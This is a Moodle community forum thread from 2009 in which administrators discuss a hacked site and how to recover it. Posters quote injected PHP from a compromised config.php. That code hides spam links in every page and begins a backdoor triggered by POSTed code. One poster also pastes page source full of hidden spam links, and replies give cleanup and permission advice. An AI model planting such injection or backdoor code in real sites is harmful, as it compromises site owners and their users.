Seems like our Moodle site has been hacked

Seems like our Moodle site has been hacked

by Martin O'Mahony -
Number of replies: 14
I noticed that the TinyMCE wouldn't work. While looking at my 1.9.5+ installation I came acroos a modified config.php. According to the timestamp it was changed while this was happening on Apache:

207.7.122.227 - - [29/Jun/2009:12:05:38 +0200] "POST /moodle//help.php HTTP/1.1" 200 11 "-" "-"
88.214.193.124 - - [29/Jun/2009:12:05:42 +0200] "GET /moodle/ HTTP/1.1" 303 242 "-" "-"
88.214.193.124 - - [29/Jun/2009:12:05:43 +0200] "GET /moodle/login/index.php HTTP/1.1" 200 150114 "-" "-"

Does this look familiar to anyone? Can anyone please tell me what really happened?

The result was this at the top of my config.php. What does it do?

<?php $links = '
xeex1012906
<a href=http://atsosxdev.doit.wisc.edu/aris/games/Framework/Site/?q=index>debt consolidation</a>
### Hundreds of lines like this omitted ###
';

function output_callback($str)
{
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}

function get_page($url)
{
return file_get_contents($url);
}

if(isset($_POST['code']) && $_POST['code'])


I changed the perms to 644 root.root. Hope this helps prevent something like this. sad
Average of ratings: -
In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Apologies for replying to my own message.

But could anyone please explain to me what the above script did? It seems like a total mystery to me. I need to know if any of our data has been compromised.

Average of ratings: -
In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Mauricio Pérez Llantén -
Hi,

Not only Moodle problem, there a link about Drupal with the injection.

http://drupal.org/node/432074

The HREF link many sites of e-learning.

Question:

Is possible that the injection can be maked with ...

#########################
# Moodle Exploit Method #
#########################
... ... exploit deleted ... ... ... ... exploit deleted ... ...

Best regards.

Mauricio Pérez

(Edited by Eloy Lafuente (stronk7) - lunes, 7 de septiembre de 2009, 22:28) Please do not post exploits in public forums. It's really one bad and dangerous habit. TIA!

Average of ratings: -
In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Picture of Core developers Picture of Plugin developers
Hello Martin,

What this code does is to add these (hundreds of) links at the end of the HTML <body> tag, probably on every of your Moodle pages. These links are invisible, (see the "display:none"), but in fact exist on your pages. Spammers often use this.

It seems your site has indeed been hacked. See some info on what to do here :
http://docs.moodle.org/en/Hacked_site_recovery

Your chmod 644 indeed prevents further config.php modifications, but from the last line you show (the one with "$_POST"), it seems the hacker left himself an open door : POST'ing data to your config.php could trigger more or less anything.

What I would do is to IMMEDIATELY completely stop the web server, or unplug the network cable to be sure, and then to read the the Moodle docs page I indicated. With some luck, only your config.php file has been hacked, and you could replace it with a fresh one (be sure to write down DB connection details etc. though).

Average of ratings: Useful (4)
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hello Nicolas, hello everybody else,

Thank you so much for your reply. As my knowledge about PHP is quite lacking, unfortunately, I would like to ask you if the steps I tooks were sufficient:

Of course I immediately took the server offline. Then I deleted the infected Moodle software completely and installed the current 1.9.5+ files from moodle.org. I then restored an old (untainted) version of the config.php.

I did not erase the moodledata directory as some students' works are in there that hadn't been backuped. sad I did, however, erase all the language files (also php) and downloaded new versions. I found no other files with a *.php* extension in the data directory except for the languages. By the way, the moodledata directory is not under the htdocs directory.

Do you think these precautions are sufficient? I'm running a pretty standard issue openSuSE machine.

When you say that the $_POST could have triggered "anything", where else should I look for modifications? Is it only php files that could be time bombs?

Should I scan the database for anything? And is there anything I should look for in the moodledata directory?

Martin

Average of ratings: -
In reply to Martin O'Mahony

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Picture of Core developers Picture of Plugin developers
Hello again,

Well, if you deleted the compromised Moodle files without backing them up, it will be difficult to sort out what happened. If you still have your config.php, could you please post it here ? (be sure to remove both lines containing your DB username and password though) It could help us know what kind of an attack type this was.

By the way, it is correct for the moodledata folder not to be under the htdocs directory.

As to look for modifications, I would look at moodle/help.php (the original hacked-moodle one), because it seems strange someone would POST to it (according to your Apache log file).

Regarding the $_POST section of your hacked config.php file, I would suggest to look for any line in your Apache logs mentioning HTTP access to this config.php file (which I think should never be called directly). Something like this in Bash should do it :
cat /path/to/your/apache.access.log | grep "config.php" >> somefile.log.txt
repeat this for each apache access log file.

To help you further, I would need :
  • the incriminated moodle/config.php file
  • the possibly compromised moodle/help.php file
  • the somefile.log.txt your would juste have built

I have to stress that the only reliable recover solution would be (as explained in the MoodleDocs page I linked in my last post, and summarized here) to :
  1. unplug the network cable
  2. identify the time of hacking and possibly the hacking method as well
  3. rebuild the server from scratch using different passwords
  4. take into account the hacking method if the hacking was due to an incorrect server configuration, and correct the server configuration if necessary
  5. recover from last backup before hack time
  6. upgrade to latest Moodle stable version
  7. plug network cable again
But if you wish to answer my three points above (Apache logs, and possibly compromised files), we might be able to resolve point 2, which would help us know (to answer your question) if the steps taken were sufficient or not.

Regards.
Average of ratings: -
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hi Nicolas,

Thank you so much for your help! I've been busy looking into the "status" of our server. And it seems like the attack only altered the aformentioned config.php.

Basically the segment I quoted earlier was added to the config.php ending with a ?>. After that the normal Moodle config.php was preserved. To check whether other files where modified, I did a find . -mtime -4 (because it had been four days since the attack on June 29th) and every file that showed up checked out just fine. So apparantly the attack was on confined to the config.php - a fact that left me worried of course. After resetting all the perms to root.root 644 I hope to prevent any similar attacks. I had a look at a database dump. Well, I couldn't find anything. Then I wasn't quite sure what I was looking for. That database is rather enormous. So, what should I be looking for there?

I am pretty sure that the attack succeeded through a hole in PHP - despite daily updates. I hope it will be fixed soon. sad

About the Apache logs, I find no such reference to when config.php was ever accessed. Probably the verbosity level is unsuitable for such details?! I got requests for other php files, though, that seem normal.

Kind regards,
Martin

Average of ratings: -
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by António Gonçalves -
Helo Nicolas, what do you think we could do to prevent this hacked? Set permissions? And what type i what crucial files and folders? Thanks António
Average of ratings: -
In reply to António Gonçalves

Re: Seems like our Moodle site has been hacked

by Martin O'Mahony -
Hi António,

With my setup it really was the perms that made the intrusion possible. However, it seems like the real problem was (is?) a security gap in php.

So setting everything in the Moodle directory to root.root 644 is probably a wise first step.
Average of ratings: -
In reply to António Gonçalves

Re: Seems like our Moodle site has been hacked

by Nicolas Dunand -
Picture of Core developers Picture of Plugin developers
Hello,

I would say that setting correct file permissions in your filesystem is one of the first (and most crucial) steps towards server security.

For a more comprehensive list of things to keep in mind, I suggest reading the following MoodleDocs pages : Security, Security FAQ, and Hacked site recovery.
Average of ratings: -
In reply to Nicolas Dunand

Re: Seems like our Moodle site has been hacked

by Anand Pai -
hi Nicolas,

Last week i had a similar type of problem..

there are some strange codes in login.php and is as follows i am pasting the view source output since this hacking code is not visiting in either index.php or in included html file.

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="css/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
body {
background-color: #E2E8DC;
background-image: url(images/login-bg.jpg);
background-repeat: repeat-x;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
-->
</style><title>mySIS</title></head>
<body><i style="display:none">
xeex51609
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index>games</a>;
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index1>sex games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index2>game cheats</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index3>free online games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index4>free games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index5>adult games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index6>online games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index7>porn games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index8>addicting games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index9>hentai games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index10>free sex games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index11>video game cheats</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index12>wii games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index13>yahoo games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index14>adult flash games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index15>ipod touch games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index16>flash games</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index17>game stop</a>
<a href=http://virtual.catedradigital.org/inf1/in.php?q=index18>fun games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index19>free java mobile games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index20>christmas games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index21>download games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index22>free adult games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index23>pc game cheats</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index24>sexy games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index25>halloween games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index26>video games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index27>teens games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index28>free game downloads</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index29>game</a>;
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index30>math games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index31>dress up games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index32>christmas party games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index33>free online sex games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index34>subject predicate games</a>
<a href=http://jdedtech.info/moodle/inf1/in.php?q=index35>free hentai games</a>
</i>
<!-- ImageReady Slices (SIS_login_screen.psd) -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center"><img src="images/spacer.gif" width="7" height="7"></td>
</tr>
<tr>
<td align="center" valign="top"><table width="647" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="images/login-top.jpg" width="647" height="216" alt=""></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">


What is your suggestion.. ? how to resolve this .?
Also i want to find out file file has been hacked..
expecting your valuable suggestions in this regard.


Average of ratings: -
In reply to Anand Pai

Re: Seems like our Moodle site has been hacked

by Mary Cooch -
Picture of Documentation writers Picture of Moodle HQ Picture of Particularly helpful Moodlers Picture of Testers Picture of Translators
Hello there - yes you have definitely been hacked. This is a good starting point if you read this: http://docs.moodle.org/en/Hacked_site_recovery
Average of ratings: Useful (1)
In reply to Mary Cooch

Re: Seems like our Moodle site has been hacked

by Jenny Watt -
Hi, All!

We are hosting on a site and have done all the security plugging we can within the confines of the host. But still on a daily basis we get hacked. The log file shows they are posting data to the help.php file. So I started writing all the POST data out and captured the attached.

It looks like they are posting PHP code to edit the config.php to insert the code. Even when I set the config.php to 600 they still hack, but the owner (and group) are my user, which is, unfortunately, a limit of the hosting.

So, since it does not appear that we ever get POST data to that file in normal use, I am checking for the existence of the POST data and then killing the script.

Any ideas how to stop this?
Average of ratings: -
In reply to Jenny Watt

Re: Seems like our Moodle site has been hacked

by Mauno Korpelainen -

Could the attacker script be inside not outside - using Base 64 Decoder

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

param1 and param2 look very similar as all injected code before.

In http://moodle.org/mod/forum/discuss.php?d=111710 madshell script could be used like any external file manager to attack again and again if the actual origin of attacks was there. After removing the madshell script (name of the file can be anything...) permissions 644 for files helped at least in that single case I have seen personally.

If nothing else helps cleaning the whole site (not only moodle but also other cms applications etc that might have injected php files and site main index.php file) and changing addresses might stop the attacks.

Average of ratings: -
In reply to Jenny Watt

Re: Seems like our Moodle site has been hacked

by Howard Miller -
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers
Did you do the security plugging *after* the initial attack?

If so, the chances are you are still infected but you just haven't found it. Completely (I do mean completely) replace the Moodle code with fresh and apply appropriate permissions and security.

If the host is configured in some crazy way that enables the web server to write to files owned by you where only have access then I would change hosts! BTW.... you don't need to write to the Moodle folders either - 500 permissions would be even better!
Average of ratings: -